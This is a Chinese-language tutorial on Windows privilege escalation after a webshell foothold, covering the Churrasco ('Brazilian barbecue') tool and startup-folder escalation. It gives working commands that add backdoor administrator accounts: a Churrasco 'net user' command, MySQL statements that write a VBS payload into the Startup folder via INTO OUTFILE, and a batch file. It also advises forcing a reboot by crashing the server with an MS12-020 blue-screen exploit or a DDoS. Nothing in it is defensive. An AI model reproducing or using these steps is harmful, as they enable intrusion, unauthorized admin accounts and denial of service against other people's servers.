提权学习：第三方软件提权（巴西烤肉提权和启动项提权）

---

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

---

目录

巴西烤肉提权

启动项提权

0x01 启动项提权

0x02 启动项提权，拓展知识

【写入启动项提权/启动项里提权】

---

 

巴西烤肉提权

      首先，基本提权前看一下，wscript 组建是否支持，如果支持的话，那我们可以传一个cmd.exe，我传了一个免杀的CMD80K,网上应该有很多，可以去网上下载。

      然后咱们大马右边的记录勾下来。选择Shell 路径：D:\fasfcmd80k.exe

      再然后我们上传巴西烤肉, Churrasco.exe同样的记录下地址, D:\fasfChurrasco.exe ，然后我们可以进行cmd.exe 命令。注意，勾上你的CMD后面的wscript.shell。

      之后将上面写上你上传的Shell 路径记录的CMD地址：D:\fasfcmd80k.exe

      下面命令行: D:\fasfChurrasco.exe "net user linc$ hacked /add"        （提升为管理员）

 

启动项提权

• 前提写入的目录需要写入权限
• 将批处理文件上传到开启启动项目录等待管理员重启即可

0x01 启动项提权

启动项提权原理：使用较少
1，查看数据库中有些什么数据表

mysql>show tables;

默认的情况下，test中没有任何表的存在。
2. 在test数据库下创建一个新的表；

mysql>create table a(cmd text);

我们创建了一个新的表，表名为a，表中只存放一个字段，字段名为cmd,为test文本。
3. 在表中插入新的内容：

insert into a values(“set wshshell=createobject(“”wscript.shell””)”);
insert into a values(“a=wshshell.run(“”cmd.exe /c net user v01cano v01cano /add“”,0)”);
insert into a values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators v01cano /add“”,0)”);

注意：双引号和括号以及后面的“0”一定要输入！我们将用这三条命令来建立一个VBS的脚本程序！

4. 好了，现在我们来看看表a中有些什么

select * from a into outfile “C://docume~1//「开始」菜单//程序//启动//a.vbs”;
重启即可创建该用户。

我们将会看到表中有三行数据，就是我们刚刚输入的内容，确认你输入的内容无误后，我们来到下一步。如下图只显示了一行

 

5、输出表为一个VBS的脚本文件

mysql>select * from a into outfile "c://docume~1//administrator//「开始」菜单//程序//启动//a.vbs";

就会在启动菜单下多出一个a.vbs的脚本

6.重启即可！

服务器重启的方式有多种如：ddos，漏洞exp

这里使用MS12-020这个漏洞来使电脑蓝屏重启，打开这个工具，输入IP，要注意的是服务器必须要开启3389。

最后，点击连接，然后点击执行，就能让服务器蓝屏，蓝屏的前提是服务器没有打这个补丁!!!

 

0x02 启动项提权，拓展知识

【写入启动项提权/启动项里提权】

查看C:\Documents and Settings\All Users\「开始」菜单\

是否可读可写，倘若可写请输入以下代码。

@echo off
net user xieying fuchou /add
net localgroup administrators xieying /add

如此一来仅需等待服务器重启即可。可以用dos执行重启命令哟。或者D他，使其重启。

参考链接：

                 http://www.cracer.com

                 https://blog.csdn.net/u011781521/article/details/60976501

 

---

我不需要自由，只想背着她的梦

一步步向前走，她给的永远不重

---